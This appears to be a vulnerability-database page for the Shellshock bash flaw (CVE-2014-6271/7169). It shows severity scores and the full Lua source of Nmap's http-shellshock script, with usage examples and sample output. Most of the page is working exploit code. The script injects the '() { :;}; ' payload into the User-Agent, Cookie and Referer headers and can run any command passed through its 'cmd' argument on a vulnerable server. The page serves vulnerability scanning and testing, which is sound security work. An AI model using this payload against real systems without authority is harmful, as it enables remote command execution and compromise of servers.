9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
To detect this vulnerability the script executes a command that prints a random string and then attempts to find it inside the response body. Web apps that don’t print back information won’t be detected with this method.
By default the script injects the payload in the HTTP headers User-Agent, Cookie, and Referer.
Vulnerability originally discovered by Stephane Chazelas.
References:
URI. Default: /
HTTP header to use in requests. Default: User-Agent
Custom command to send inside payload. Default: nil
See the documentation for the slaxml library.
See the documentation for the http library.
See the documentation for the smbauth library.
See the documentation for the vulns library.
nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known as Shellshock. It seems the server
| is executing commands injected via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://seclists.org/oss-sec/2014/q3/685
|_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local rand = require "rand"
description = [[
Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and
CVE-2014-7169) in web applications.
To detect this vulnerability the script executes a command that prints a random
string and then attempts to find it inside the response body. Web apps that
don't print back information won't be detected with this method.
By default the script injects the payload in the HTTP headers User-Agent,
Cookie, and Referer.
Vulnerability originally discovered by Stephane Chazelas.
References:
* http://www.openwall.com/lists/oss-security/2014/09/24/10
* http://seclists.org/oss-sec/2014/q3/685
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
]]
---
-- @usage
-- nmap -sV -p- --script http-shellshock <target>
-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-shellshock:
-- | VULNERABLE:
-- | HTTP Shellshock vulnerability
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-6271
-- | This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- | is executing commands injected via malicious HTTP headers.
-- |
-- | Disclosure date: 2014-09-24
-- | References:
-- | http://www.openwall.com/lists/oss-security/2014/09/24/10
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
-- | http://seclists.org/oss-sec/2014/q3/685
-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
--
-- @xmloutput
-- <elem key="title">HTTP Shellshock vulnerability</elem>
-- <elem key="state">VULNERABLE (Exploitable)</elem>
-- <table key="ids">
-- <elem>CVE:CVE-2014-6271</elem>
-- </table>
-- <table key="description">
-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- 
is executing commands injected via malicious HTTP headers. 
 </elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2014</elem>
-- <elem key="day">24</elem>
-- <elem key="month">09</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2014-09-24</elem>
-- <table key="refs">
-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>
-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>
-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem>
-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>
-- </table>
-- @args http-shellshock.uri URI. Default: /
-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent
-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil
---
author = {"Paulino Calderon <calderon()websec.mx","Paul Amar <paul()sensepost com>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}
portrule = shortport.http
function generate_http_req(host, port, uri, custom_header, cmd)
local rnd = nil
--Set custom or probe with random string as cmd
if not cmd then
local rnd1 = rand.random_alpha(7)
local rnd2 = rand.random_alpha(7)
rnd = rnd1 .. rnd2
cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2)
end
cmd = "() { :;}; " .. cmd
-- Plant the payload in the HTTP headers
local options = {header={}}
options["no_cache"] = true
if custom_header == nil then
stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd)
options["header"]["User-Agent"] = cmd
options["header"]["Referer"] = cmd
options["header"]["Cookie"] = cmd
else
stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header)
options["header"][custom_header] = cmd
end
local req = http.get(host, port, uri, options)
return req, rnd
end
action = function(host, port)
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or nil
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
local req, rnd = generate_http_req(host, port, uri, http_header, nil)
if req.status == 200 and req.body:find(rnd, 1, true) then
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'HTTP Shellshock vulnerability',
state = vulns.STATE.NOT_VULN,
description = [[
This web application might be affected by the vulnerability known
as Shellshock. It seems the server is executing commands injected
via malicious HTTP headers.
]],
IDS = {CVE = 'CVE-2014-6271'},
references = {
'http://www.openwall.com/lists/oss-security/2014/09/24/10',
'http://seclists.org/oss-sec/2014/q3/685',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
},
dates = {
disclosure = {year = '2014', month = '09', day = '24'},
},
}
stdnse.debug1("Random pattern '%s' was found in page. Host seems vulnerable.", rnd)
vuln.state = vulns.STATE.EXPLOIT
if cmd ~= nil then
req = generate_http_req(host, port, uri, http_header, cmd)
vuln.exploit_results = req.body
end
return vuln_report:make_output(vuln)
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%